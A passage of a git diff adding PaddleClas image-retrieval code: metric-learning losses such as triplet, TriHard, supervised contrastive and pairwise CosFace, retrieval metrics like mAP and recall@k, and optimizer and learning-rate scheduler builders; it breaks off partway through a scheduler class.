paddle.mean(paddle.sum(paddle.square(features), axis=1)) + l2loss = 0.5 * reg_lambda * reg + return {"npairsloss": xentloss + l2loss} diff --git a/Smart_container/PaddleClas/ppcls/loss/pairwisecosface.py b/Smart_container/PaddleClas/ppcls/loss/pairwisecosface.py new file mode 100644 index 0000000..beb8068 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/pairwisecosface.py @@ -0,0 +1,55 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import math +import paddle +import paddle.nn as nn +import paddle.nn.functional as F + + +class PairwiseCosface(nn.Layer): + def __init__(self, margin, gamma): + super(PairwiseCosface, self).__init__() + self.margin = margin + self.gamma = gamma + + def forward(self, embedding, targets): + if isinstance(embedding, dict): + embedding = embedding['features'] + # Normalize embedding features + embedding = F.normalize(embedding, axis=1) + dist_mat = paddle.matmul(embedding, embedding, transpose_y=True) + + N = dist_mat.shape[0] + is_pos = targets.reshape([N,1]).expand([N,N]).equal(paddle.t(targets.reshape([N,1]).expand([N,N]))).astype('float') + is_neg = targets.reshape([N,1]).expand([N,N]).not_equal(paddle.t(targets.reshape([N,1]).expand([N,N]))).astype('float') + + # Mask scores related to itself + is_pos = is_pos - paddle.eye(N, N) + + s_p = dist_mat * is_pos + s_n = dist_mat * is_neg + + logit_p = -self.gamma * s_p + (-99999999.) * (1 - is_pos) + logit_n = self.gamma * (s_n + self.margin) + (-99999999.) * (1 - is_neg) + + loss = F.softplus(paddle.logsumexp(logit_p, axis=1) + paddle.logsumexp(logit_n, axis=1)).mean() + + return {"PairwiseCosface": loss} + + diff --git a/Smart_container/PaddleClas/ppcls/loss/supconloss.py b/Smart_container/PaddleClas/ppcls/loss/supconloss.py new file mode 100644 index 0000000..3dd33bc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/supconloss.py @@ -0,0 +1,108 @@ +import paddle +from paddle import nn + + +class SupConLoss(nn.Layer): + """Supervised Contrastive Learning: https://arxiv.org/pdf/2004.11362.pdf. + It also supports the unsupervised contrastive loss in SimCLR""" + + def __init__(self, + views=16, + temperature=0.07, + contrast_mode='all', + base_temperature=0.07, + normalize_feature=True): + super(SupConLoss, self).__init__() + self.temperature = paddle.to_tensor(temperature) + self.contrast_mode = contrast_mode + self.base_temperature = paddle.to_tensor(base_temperature) + self.num_ids = None + self.views = views + self.normalize_feature = normalize_feature + + def forward(self, features, labels, mask=None): + """Compute loss for model. If both `labels` and `mask` are None, + it degenerates to SimCLR unsupervised loss: + https://arxiv.org/pdf/2002.05709.pdf + Args: + features: hidden vector of shape [bsz, n_views, ...]. + labels: ground truth of shape [bsz]. + mask: contrastive mask of shape [bsz, bsz], mask_{i,j}=1 if sample j + has the same class as sample i. Can be asymmetric. + Returns: + A loss scalar. + """ + features = features["features"] + if self.num_ids is None: + self.num_ids = int(features.shape[0] / self.views) + + if self.normalize_feature: + features = 1. * features / (paddle.expand_as( + paddle.norm( + features, p=2, axis=-1, keepdim=True), features) + 1e-12) + features = features.reshape([self.num_ids, self.views, -1]) + labels = labels.reshape([self.num_ids, self.views])[:, 0] + + if len(features.shape) < 3: + raise ValueError('`features` needs to be [bsz, n_views, ...],' + 'at least 3 dimensions are required') + if len(features.shape) > 3: + features = features.reshape( + [features.shape[0], features.shape[1], -1]) + + batch_size = features.shape[0] + if labels is not None and mask is not None: + raise ValueError('Cannot define both `labels` and `mask`') + elif labels is None and mask is None: + mask = paddle.eye(batch_size, dtype='float32') + elif labels is not None: + labels = labels.reshape([-1, 1]) + if labels.shape[0] != batch_size: + raise ValueError( + 'Num of labels does not match num of features') + mask = paddle.cast( + paddle.equal(labels, paddle.t(labels)), 'float32') + else: + mask = paddle.cast(mask, 'float32') + + contrast_count = features.shape[1] + contrast_feature = paddle.concat( + paddle.unbind( + features, axis=1), axis=0) + if self.contrast_mode == 'one': + anchor_feature = features[:, 0] + anchor_count = 1 + elif self.contrast_mode == 'all': + anchor_feature = contrast_feature + anchor_count = contrast_count + else: + raise ValueError('Unknown mode: {}'.format(self.contrast_mode)) + + # compute logits + anchor_dot_contrast = paddle.divide( + paddle.matmul(anchor_feature, paddle.t(contrast_feature)), + self.temperature) + # for numerical stability + logits_max = paddle.max(anchor_dot_contrast, axis=1, keepdim=True) + logits = anchor_dot_contrast - logits_max.detach() + + # tile mask + mask = paddle.tile(mask, [anchor_count, contrast_count]) + + logits_mask = 1 - paddle.eye(batch_size * anchor_count) + mask = mask * logits_mask + + # compute log_prob + exp_logits = paddle.exp(logits) * logits_mask + log_prob = logits - paddle.log( + paddle.sum(exp_logits, axis=1, keepdim=True)) + + # compute mean of log-likelihood over positive + mean_log_prob_pos = paddle.sum((mask * log_prob), + axis=1) / paddle.sum(mask, axis=1) + + # loss + loss = -(self.temperature / self.base_temperature) * mean_log_prob_pos + loss = paddle.mean(loss.reshape([anchor_count, batch_size])) + + return {"SupConLoss": loss} diff --git a/Smart_container/PaddleClas/ppcls/loss/trihardloss.py b/Smart_container/PaddleClas/ppcls/loss/trihardloss.py new file mode 100644 index 0000000..132c604 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/trihardloss.py @@ -0,0 +1,82 @@ +# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import paddle +from .comfunc import rerange_index + + +class TriHardLoss(paddle.nn.Layer): + """ + TriHard Loss, based on triplet loss. USE P * K samples. + the batch size is fixed. Batch_size = P * K; but the K may vary between batches. + same label gather together + + supported_metrics = [ + 'euclidean', + 'sqeuclidean', + 'cityblock', + ] + only consider samples_each_class = 2 + """ + + def __init__(self, batch_size=120, samples_each_class=2, margin=0.1): + super(TriHardLoss, self).__init__() + self.margin = margin + self.samples_each_class = samples_each_class + self.batch_size = batch_size + self.rerange_index = rerange_index(batch_size, samples_each_class) + + def forward(self, input, target=None): + features = input["features"] + assert (self.batch_size == features.shape[0]) + + #normalization + features = self._nomalize(features) + samples_each_class = self.samples_each_class + rerange_index = paddle.to_tensor(self.rerange_index) + + #calc sm + diffs = paddle.unsqueeze( + features, axis=1) - paddle.unsqueeze( + features, axis=0) + similary_matrix = paddle.sum(paddle.square(diffs), axis=-1) + + #rerange + tmp = paddle.reshape(similary_matrix, shape=[-1, 1]) + tmp = paddle.gather(tmp, index=rerange_index) + similary_matrix = paddle.reshape(tmp, shape=[-1, self.batch_size]) + + #split + ignore, pos, neg = paddle.split( + similary_matrix, + num_or_sections=[1, samples_each_class - 1, -1], + axis=1) + + ignore.stop_gradient = True + hard_pos = paddle.max(pos, axis=1) + hard_neg = paddle.min(neg, axis=1) + + loss = hard_pos + self.margin - hard_neg + loss = paddle.nn.ReLU()(loss) + loss = paddle.mean(loss) + return {"trihardloss": loss} + + def _nomalize(self, input): + input_norm = paddle.sqrt( + paddle.sum(paddle.square(input), axis=1, keepdim=True)) + return paddle.divide(input, input_norm) diff --git a/Smart_container/PaddleClas/ppcls/loss/triplet.py b/Smart_container/PaddleClas/ppcls/loss/triplet.py new file mode 100644 index 0000000..d1c7eec --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/triplet.py @@ -0,0 +1,137 @@ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import paddle +import paddle.nn as nn + + +class TripletLossV2(nn.Layer): + """Triplet loss with hard positive/negative mining. + Args: + margin (float): margin for triplet. + """ + + def __init__(self, margin=0.5, normalize_feature=True): + super(TripletLossV2, self).__init__() + self.margin = margin + self.ranking_loss = paddle.nn.loss.MarginRankingLoss(margin=margin) + self.normalize_feature = normalize_feature + + def forward(self, input, target): + """ + Args: + inputs: feature matrix with shape (batch_size, feat_dim) + target: ground truth labels with shape (num_classes) + """ + inputs = input["features"] + + if self.normalize_feature: + inputs = 1. * inputs / (paddle.expand_as( + paddle.norm( + inputs, p=2, axis=-1, keepdim=True), inputs) + 1e-12) + + bs = inputs.shape[0] + + # compute distance + dist = paddle.pow(inputs, 2).sum(axis=1, keepdim=True).expand([bs, bs]) + dist = dist + dist.t() + dist = paddle.addmm( + input=dist, x=inputs, y=inputs.t(), alpha=-2.0, beta=1.0) + dist = paddle.clip(dist, min=1e-12).sqrt() + + # hard negative mining + is_pos = paddle.expand(target, ( + bs, bs)).equal(paddle.expand(target, (bs, bs)).t()) + is_neg = paddle.expand(target, ( + bs, bs)).not_equal(paddle.expand(target, (bs, bs)).t()) + + # `dist_ap` means distance(anchor, positive) + ## both `dist_ap` and `relative_p_inds` with shape [N, 1] + ''' + dist_ap, relative_p_inds = paddle.max( + paddle.reshape(dist[is_pos], (bs, -1)), axis=1, keepdim=True) + # `dist_an` means distance(anchor, negative) + # both `dist_an` and `relative_n_inds` with shape [N, 1] + dist_an, relative_n_inds = paddle.min( + paddle.reshape(dist[is_neg], (bs, -1)), axis=1, keepdim=True) + ''' + dist_ap = paddle.max(paddle.reshape( + paddle.masked_select(dist, is_pos), (bs, -1)), + axis=1, + keepdim=True) + # `dist_an` means distance(anchor, negative) + # both `dist_an` and `relative_n_inds` with shape [N, 1] + dist_an = paddle.min(paddle.reshape( + paddle.masked_select(dist, is_neg), (bs, -1)), + axis=1, + keepdim=True) + # shape [N] + dist_ap = paddle.squeeze(dist_ap, axis=1) + dist_an = paddle.squeeze(dist_an, axis=1) + + # Compute ranking hinge loss + y = paddle.ones_like(dist_an) + loss = self.ranking_loss(dist_an, dist_ap, y) + return {"TripletLossV2": loss} + + +class TripletLoss(nn.Layer): + """Triplet loss with hard positive/negative mining. + Reference: + Hermans et al. In Defense of the Triplet Loss for Person Re-Identification. arXiv:1703.07737. + Code imported from https://github.com/Cysu/open-reid/blob/master/reid/loss/triplet.py. + Args: + margin (float): margin for triplet. + """ + + def __init__(self, margin=1.0): + super(TripletLoss, self).__init__() + self.margin = margin + self.ranking_loss = paddle.nn.loss.MarginRankingLoss(margin=margin) + + def forward(self, input, target): + """ + Args: + inputs: feature matrix with shape (batch_size, feat_dim) + target: ground truth labels with shape (num_classes) + """ + inputs = input["features"] + + bs = inputs.shape[0] + # Compute pairwise distance, replace by the official when merged + dist = paddle.pow(inputs, 2).sum(axis=1, keepdim=True).expand([bs, bs]) + dist = dist + dist.t() + dist = paddle.addmm( + input=dist, x=inputs, y=inputs.t(), alpha=-2.0, beta=1.0) + dist = paddle.clip(dist, min=1e-12).sqrt() + + mask = paddle.equal( + target.expand([bs, bs]), target.expand([bs, bs]).t()) + mask_numpy_idx = mask.numpy() + dist_ap, dist_an = [], [] + for i in range(bs): + # dist_ap_i = paddle.to_tensor(dist[i].numpy()[mask_numpy_idx[i]].max(),dtype='float64').unsqueeze(0) + # dist_ap_i.stop_gradient = False + # dist_ap.append(dist_ap_i) + dist_ap.append( + max([ + dist[i][j] if mask_numpy_idx[i][j] == True else float( + "-inf") for j in range(bs) + ]).unsqueeze(0)) + # dist_an_i = paddle.to_tensor(dist[i].numpy()[mask_numpy_idx[i] == False].min(), dtype='float64').unsqueeze(0) + # dist_an_i.stop_gradient = False + # dist_an.append(dist_an_i) + dist_an.append( + min([ + dist[i][k] if mask_numpy_idx[i][k] == False else float( + "inf") for k in range(bs) + ]).unsqueeze(0)) + + dist_ap = paddle.concat(dist_ap, axis=0) + dist_an = paddle.concat(dist_an, axis=0) + + # Compute ranking hinge loss + y = paddle.ones_like(dist_an) + loss = self.ranking_loss(dist_an, dist_ap, y) + return {"TripletLoss": loss} diff --git a/Smart_container/PaddleClas/ppcls/metric/__init__.py b/Smart_container/PaddleClas/ppcls/metric/__init__.py new file mode 100644 index 0000000..9472123 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/metric/__init__.py @@ -0,0 +1,51 @@ +#copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +#Licensed under the Apache License, Version 2.0 (the "License"); +#you may not use this file except in compliance with the License. +#You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +#Unless required by applicable law or agreed to in writing, software +#distributed under the License is distributed on an "AS IS" BASIS, +#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +#See the License for the specific language governing permissions and +#limitations under the License. + +from paddle import nn +import copy +from collections import OrderedDict + +from .metrics import TopkAcc, mAP, mINP, Recallk, Precisionk +from .metrics import DistillationTopkAcc +from .metrics import GoogLeNetTopkAcc +from .metrics import HammingDistance, AccuracyScore + + +class CombinedMetrics(nn.Layer): + def __init__(self, config_list): + super().__init__() + self.metric_func_list = [] + assert isinstance(config_list, list), ( + 'operator config should be a list') + for config in config_list: + assert isinstance(config, + dict) and len(config) == 1, "yaml format error" + metric_name = list(config)[0] + metric_params = config[metric_name] + if metric_params is not None: + self.metric_func_list.append( + eval(metric_name)(**metric_params)) + else: + self.metric_func_list.append(eval(metric_name)()) + + def __call__(self, *args, **kwargs): + metric_dict = OrderedDict() + for idx, metric_func in enumerate(self.metric_func_list): + metric_dict.update(metric_func(*args, **kwargs)) + return metric_dict + + +def build_metrics(config): + metrics_list = CombinedMetrics(copy.deepcopy(config)) + return metrics_list diff --git a/Smart_container/PaddleClas/ppcls/metric/metrics.py b/Smart_container/PaddleClas/ppcls/metric/metrics.py new file mode 100644 index 0000000..37509eb --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/metric/metrics.py @@ -0,0 +1,308 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import numpy as np +import paddle +import paddle.nn as nn +import paddle.nn.functional as F + +from sklearn.metrics import hamming_loss +from sklearn.metrics import accuracy_score as accuracy_metric +from sklearn.metrics import multilabel_confusion_matrix +from sklearn.preprocessing import binarize + + +class TopkAcc(nn.Layer): + def __init__(self, topk=(1, 5)): + super().__init__() + assert isinstance(topk, (int, list, tuple)) + if isinstance(topk, int): + topk = [topk] + self.topk = topk + + def forward(self, x, label): + if isinstance(x, dict): + x = x["logits"] + + metric_dict = dict() + for k in self.topk: + metric_dict["top{}".format(k)] = paddle.metric.accuracy( + x, label, k=k) + return metric_dict + + +class mAP(nn.Layer): + def __init__(self): + super().__init__() + + def forward(self, similarities_matrix, query_img_id, gallery_img_id, + keep_mask): + metric_dict = dict() + + choosen_indices = paddle.argsort( + similarities_matrix, axis=1, descending=True) + gallery_labels_transpose = paddle.transpose(gallery_img_id, [1, 0]) + gallery_labels_transpose = paddle.broadcast_to( + gallery_labels_transpose, + shape=[ + choosen_indices.shape[0], gallery_labels_transpose.shape[1] + ]) + choosen_label = paddle.index_sample(gallery_labels_transpose, + choosen_indices) + equal_flag = paddle.equal(choosen_label, query_img_id) + if keep_mask is not None: + keep_mask = paddle.index_sample( + keep_mask.astype('float32'), choosen_indices) + equal_flag = paddle.logical_and(equal_flag, + keep_mask.astype('bool')) + equal_flag = paddle.cast(equal_flag, 'float32') + + num_rel = paddle.sum(equal_flag, axis=1) + num_rel = paddle.greater_than(num_rel, paddle.to_tensor(0.)) + num_rel_index = paddle.nonzero(num_rel.astype("int")) + num_rel_index = paddle.reshape(num_rel_index, [num_rel_index.shape[0]]) + equal_flag = paddle.index_select(equal_flag, num_rel_index, axis=0) + + acc_sum = paddle.cumsum(equal_flag, axis=1) + div = paddle.arange(acc_sum.shape[1]).astype("float32") + 1 + precision = paddle.divide(acc_sum, div) + + #calc map + precision_mask = paddle.multiply(equal_flag, precision) + ap = paddle.sum(precision_mask, axis=1) / paddle.sum(equal_flag, + axis=1) + metric_dict["mAP"] = paddle.mean(ap).numpy()[0] + return metric_dict + + +class mINP(nn.Layer): + def __init__(self): + super().__init__() + + def forward(self, similarities_matrix, query_img_id, gallery_img_id, + keep_mask): + metric_dict = dict() + + choosen_indices = paddle.argsort( + similarities_matrix, axis=1, descending=True) + gallery_labels_transpose = paddle.transpose(gallery_img_id, [1, 0]) + gallery_labels_transpose = paddle.broadcast_to( + gallery_labels_transpose, + shape=[ + choosen_indices.shape[0], gallery_labels_transpose.shape[1] + ]) + choosen_label = paddle.index_sample(gallery_labels_transpose, + choosen_indices) + equal_flag = paddle.equal(choosen_label, query_img_id) + if keep_mask is not None: + keep_mask = paddle.index_sample( + keep_mask.astype('float32'), choosen_indices) + equal_flag = paddle.logical_and(equal_flag, + keep_mask.astype('bool')) + equal_flag = paddle.cast(equal_flag, 'float32') + + num_rel = paddle.sum(equal_flag, axis=1) + num_rel = paddle.greater_than(num_rel, paddle.to_tensor(0.)) + num_rel_index = paddle.nonzero(num_rel.astype("int")) + num_rel_index = paddle.reshape(num_rel_index, [num_rel_index.shape[0]]) + equal_flag = paddle.index_select(equal_flag, num_rel_index, axis=0) + + #do accumulative sum + div = paddle.arange(equal_flag.shape[1]).astype("float32") + 2 + minus = paddle.divide(equal_flag, div) + auxilary = paddle.subtract(equal_flag, minus) + hard_index = paddle.argmax(auxilary, axis=1).astype("float32") + all_INP = paddle.divide(paddle.sum(equal_flag, axis=1), hard_index) + mINP = paddle.mean(all_INP) + metric_dict["mINP"] = mINP.numpy()[0] + return metric_dict + + +class Recallk(nn.Layer): + def __init__(self, topk=(1, 5)): + super().__init__() + assert isinstance(topk, (int, list, tuple)) + if isinstance(topk, int): + topk = [topk] + self.topk = topk + + def forward(self, similarities_matrix, query_img_id, gallery_img_id, + keep_mask): + metric_dict = dict() + + #get cmc + choosen_indices = paddle.argsort( + similarities_matrix, axis=1, descending=True) + gallery_labels_transpose = paddle.transpose(gallery_img_id, [1, 0]) + gallery_labels_transpose = paddle.broadcast_to( + gallery_labels_transpose, + shape=[ + choosen_indices.shape[0], gallery_labels_transpose.shape[1] + ]) + choosen_label = paddle.index_sample(gallery_labels_transpose, + choosen_indices) + equal_flag = paddle.equal(choosen_label, query_img_id) + if keep_mask is not None: + keep_mask = paddle.index_sample( + keep_mask.astype('float32'), choosen_indices) + equal_flag = paddle.logical_and(equal_flag, + keep_mask.astype('bool')) + equal_flag = paddle.cast(equal_flag, 'float32') + real_query_num = paddle.sum(equal_flag, axis=1) + real_query_num = paddle.sum( + paddle.greater_than(real_query_num, paddle.to_tensor(0.)).astype( + "float32")) + + acc_sum = paddle.cumsum(equal_flag, axis=1) + mask = paddle.greater_than(acc_sum, + paddle.to_tensor(0.)).astype("float32") + all_cmc = (paddle.sum(mask, axis=0) / real_query_num).numpy() + + for k in self.topk: + metric_dict["recall{}".format(k)] = all_cmc[k - 1] + return metric_dict + + +class Precisionk(nn.Layer): + def __init__(self, topk=(1, 5)): + super().__init__() + assert isinstance(topk, (int, list, tuple)) + if isinstance(topk, int): + topk = [topk] + self.topk = topk + + def forward(self, similarities_matrix, query_img_id, gallery_img_id, + keep_mask): + metric_dict = dict() + + #get cmc + choosen_indices = paddle.argsort( + similarities_matrix, axis=1, descending=True) + gallery_labels_transpose = paddle.transpose(gallery_img_id, [1, 0]) + gallery_labels_transpose = paddle.broadcast_to( + gallery_labels_transpose, + shape=[ + choosen_indices.shape[0], gallery_labels_transpose.shape[1] + ]) + choosen_label = paddle.index_sample(gallery_labels_transpose, + choosen_indices) + equal_flag = paddle.equal(choosen_label, query_img_id) + if keep_mask is not None: + keep_mask = paddle.index_sample( + keep_mask.astype('float32'), choosen_indices) + equal_flag = paddle.logical_and(equal_flag, + keep_mask.astype('bool')) + equal_flag = paddle.cast(equal_flag, 'float32') + + Ns = paddle.arange(gallery_img_id.shape[0]) + 1 + equal_flag_cumsum = paddle.cumsum(equal_flag, axis=1) + Precision_at_k = (paddle.mean(equal_flag_cumsum, axis=0) / Ns).numpy() + + for k in self.topk: + metric_dict["precision@{}".format(k)] = Precision_at_k[k - 1] + + return metric_dict + + +class DistillationTopkAcc(TopkAcc): + def __init__(self, model_key, feature_key=None, topk=(1, 5)): + super().__init__(topk=topk) + self.model_key = model_key + self.feature_key = feature_key + + def forward(self, x, label): + x = x[self.model_key] + if self.feature_key is not None: + x = x[self.feature_key] + return super().forward(x, label) + + +class GoogLeNetTopkAcc(TopkAcc): + def __init__(self, topk=(1, 5)): + super().__init__() + assert isinstance(topk, (int, list, tuple)) + if isinstance(topk, int): + topk = [topk] + self.topk = topk + + def forward(self, x, label): + return super().forward(x[0], label) + + +class MutiLabelMetric(object): + def __init__(self): + pass + + def _multi_hot_encode(self, logits, threshold=0.5): + return binarize(logits, threshold=threshold) + + def __call__(self, output): + output = F.sigmoid(output) + preds = self._multi_hot_encode(logits=output.numpy(), threshold=0.5) + return preds + + +class HammingDistance(MutiLabelMetric): + """ + Soft metric based label for multilabel classification + Returns: + The smaller the return value is, the better model is. + """ + + def __init__(self): + super().__init__() + + def __call__(self, output, target): + preds = super().__call__(output) + metric_dict = dict() + metric_dict["HammingDistance"] = paddle.to_tensor( + hamming_loss(target, preds)) + return metric_dict + + +class AccuracyScore(MutiLabelMetric): + """ + Hard metric for multilabel classification + Args: + base: ["sample", "label"], default="sample" + if "sample", return metric score based sample, + if "label", return metric score based label. + Returns: + accuracy: + """ + + def __init__(self, base="label"): + super().__init__() + assert base in ["sample", "label" + ], 'must be one of ["sample", "label"]' + self.base = base + + def __call__(self, output, target): + preds = super().__call__(output) + metric_dict = dict() + if self.base == "sample": + accuracy = accuracy_metric(target, preds) + elif self.base == "label": + mcm = multilabel_confusion_matrix(target, preds) + tns = mcm[:, 0, 0] + fns = mcm[:, 1, 0] + tps = mcm[:, 1, 1] + fps = mcm[:, 0, 1] + accuracy = (sum(tps) + sum(tns)) / ( + sum(tps) + sum(tns) + sum(fns) + sum(fps)) + precision = sum(tps) / (sum(tps) + sum(fps)) + recall = sum(tps) / (sum(tps) + sum(fns)) + F1 = 2 * (accuracy * recall) / (accuracy + recall) + metric_dict["AccuracyScore"] = paddle.to_tensor(accuracy) + return metric_dict diff --git a/Smart_container/PaddleClas/ppcls/optimizer/__init__.py b/Smart_container/PaddleClas/ppcls/optimizer/__init__.py new file mode 100644 index 0000000..cc64a9c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/optimizer/__init__.py @@ -0,0 +1,71 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import copy +import paddle + +from ppcls.utils import logger + +from . import optimizer + +__all__ = ['build_optimizer'] + + +def build_lr_scheduler(lr_config, epochs, step_each_epoch): + from . import learning_rate + lr_config.update({'epochs': epochs, 'step_each_epoch': step_each_epoch}) + if 'name' in lr_config: + lr_name = lr_config.pop('name') + lr = getattr(learning_rate, lr_name)(**lr_config) + if isinstance(lr, paddle.optimizer.lr.LRScheduler): + return lr + else: + return lr() + else: + lr = lr_config['learning_rate'] + return lr + + +def build_optimizer(config, epochs, step_each_epoch, model_list): + config = copy.deepcopy(config) + # step1 build lr + lr = build_lr_scheduler(config.pop('lr'), epochs, step_each_epoch) + logger.debug("build lr ({}) success..".format(lr)) + # step2 build regularization + if 'regularizer' in config and config['regularizer'] is not None: + if 'weight_decay' in config: + logger.warning( + "ConfigError: Only one of regularizer and weight_decay can be set in Optimizer Config. \"weight_decay\" has been ignored." + ) + reg_config = config.pop('regularizer') + reg_name = reg_config.pop('name') + 'Decay' + reg = getattr(paddle.regularizer, reg_name)(**reg_config) + config["weight_decay"] = reg + logger.debug("build regularizer ({}) success..".format(reg)) + # step3 build optimizer + optim_name = config.pop('name') + if 'clip_norm' in config: + clip_norm = config.pop('clip_norm') + grad_clip = paddle.nn.ClipGradByNorm(clip_norm=clip_norm) + else: + grad_clip = None + optim = getattr(optimizer, optim_name)(learning_rate=lr, + grad_clip=grad_clip, + **config)(model_list=model_list) + logger.debug("build optimizer ({}) success..".format(optim)) + return optim, lr diff --git a/Smart_container/PaddleClas/ppcls/optimizer/learning_rate.py b/Smart_container/PaddleClas/ppcls/optimizer/learning_rate.py new file mode 100644 index 0000000..b59387d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/optimizer/learning_rate.py @@ -0,0 +1,326 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import (absolute_import, division, print_function, + unicode_literals) + +from paddle.optimizer import lr +from paddle.optimizer.lr import LRScheduler + +from ppcls.utils import logger + + +class Linear(object): + """ + Linear learning rate decay + Args: + lr (float): The initial learning rate. It is a python float number. + epochs(int): The decay step size. It determines the decay cycle. + end_lr(float, optional): The minimum final learning rate. Default: 0.0001. + power(float, optional): Power of polynomial. Default: 1.0. + warmup_epoch(int): The epoch numbers for LinearWarmup. Default: 0. + warmup_start_lr(float): Initial learning rate of warm up. Default: 0.0. + last_epoch (int, optional): The index of last epoch. Can be set to restart training. Default: -1, means initial learning rate. + """ + + def __init__(self, + learning_rate, + epochs, + step_each_epoch, + end_lr=0.0, + power=1.0, + warmup_epoch=0, + warmup_start_lr=0.0, + last_epoch=-1, + **kwargs): + super().__init__() + if warmup_epoch >= epochs: + msg = f"When using warm up, the value of \"Global.epochs\" must be greater than value of \"Optimizer.lr.warmup_epoch\". The value of \"Optimizer.lr.warmup_epoch\" has been set to {epochs}." + logger.warning(msg) + warmup_epoch = epochs + self.learning_rate = learning_rate + self.steps = (epochs - warmup_epoch) * step_each_epoch + self.end_lr = end_lr + self.power = power + self.last_epoch = last_epoch + self.warmup_steps = round(warmup_epoch * step_each_epoch) + self.warmup_start_lr = warmup_start_lr + + def __call__(self): + learning_rate = lr.PolynomialDecay( + learning_rate=self.learning_rate, + decay_steps=self.steps, + end_lr=self.end_lr, + power=self.power, + last_epoch=self. + last_epoch) if self.steps > 0 else self.learning_rate + if self.warmup_steps > 0: + learning_rate = lr.LinearWarmup( + learning_rate=learning_rate, + warmup_steps=self.warmup_steps, + start_lr=self.warmup_start_lr, + end_lr=self.learning_rate, + last_epoch=self.last_epoch) + return learning_rate + + +class Cosine(object): + """ + Cosine learning rate decay + lr = 0.05 * (math.cos(epoch * (math.pi / epochs)) + 1) + Args: + lr(float): initial learning rate + step_each_epoch(int): steps each epoch + epochs(int): total training epochs + eta_min(float): Minimum learning rate. Default: 0.0. + warmup_epoch(int): The epoch numbers for LinearWarmup. Default: 0. + warmup_start_lr(float): Initial learning rate of warm up. Default: 0.0. + last_epoch (int, optional): The index of last epoch. Can be set to restart training. Default: -1, means initial learning rate. + """ + + def __init__(self, + learning_rate, + step_each_epoch, + epochs, + eta_min=0.0, + warmup_epoch=0, + warmup_start_lr=0.0, + last_epoch=-1, + **kwargs): + super().__init__() + if warmup_epoch >= epochs: + msg = f"When using warm up, the value of \"Global.epochs\" must be greater than value of \"Optimizer.lr.warmup_epoch\". The value of \"Optimizer.lr.warmup_epoch\" has been set to {epochs}." + logger.warning(msg) + warmup_epoch = epochs + self.learning_rate = learning_rate + self.T_max = (epochs - warmup_epoch) * step_each_epoch + self.eta_min = eta_min + self.last_epoch = last_epoch + self.warmup_steps = round(warmup_epoch * step_each_epoch) + self.warmup_start_lr = warmup_start_lr + + def __call__(self): + learning_rate = lr.CosineAnnealingDecay( + learning_rate=self.learning_rate, + T_max=self.T_max, + eta_min=self.eta_min, + last_epoch=self. + last_epoch) if self.T_max > 0 else self.learning_rate + if self.warmup_steps > 0: + learning_rate = lr.LinearWarmup( + learning_rate=learning_rate, + warmup_steps=self.warmup_steps, + start_lr=self.warmup_start_lr, + end_lr=self.learning_rate, + last_epoch=self.last_epoch) + return learning_rate + + +class Step(object): + """ + Piecewise learning rate decay + Args: + step_each_epoch(int): steps each epoch + learning_rate (float): The initial learning rate. It is a python float number. + step_size (int): the interval to update. + gamma (float, optional): The Ratio that the learning rate will be reduced. ``new_lr = origin_lr * gamma`` . + It should be less than 1.0. Default: 0.1. + warmup_epoch(int): The epoch numbers for LinearWarmup. Default: 0. + warmup_start_lr(float): Initial learning rate of warm up. Default: 0.0. + last_epoch (int, optional): The index of last epoch. Can be set to restart training. Default: -1, means initial learning rate. + """ + + def __init__(self, + learning_rate, + step_size, + step_each_epoch, + epochs, + gamma, + warmup_epoch=0, + 